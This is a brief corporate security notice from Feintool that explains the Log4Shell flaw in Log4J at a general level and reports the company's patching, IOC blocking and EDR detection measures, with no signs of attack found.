Log4Shell: No data loss or signs of attack at Feintool


Log4Shell is the name given to a critical zero-day vulnerability that surfaced Mid-December when it was exploited in the wild in remote-code compromises against Minecraft servers. The source of the vulnerability was Log4J, a logging utility used by thousands if not millions of apps, including those used inside just about every enterprise on the planet.

Another well-known example would be Apple iCloud.

What’s Log4J and what makes Log4Shell such a big deal?

Log4J is an open source Java-based logging tool available from Apache. It has the ability to perform network lookups using the Java Naming and Directory Interface to obtain services from the Lightweight Directory Access Protocol (LDAP). The end result: Log4j will interpret a log message as a URL, go and fetch it, and even execute any executable payload it contains with the full privileges of the main program. Exploits are triggered inside text using the ${} syntax, allowing them to be included in browser user agents or other commonly logged attributes.

What Feintool has done so far

As of today, all applications that are accessible from the Internet have been checked, patched or disabled. To date, we have had no data loss or signs of attack.
To protect our systems, we have blocked the known indicators of compromise (IOCs) and ensured that our Endpoint Detection and Response (EDR) solution is able to detect any attempt to exploit this vulnerability.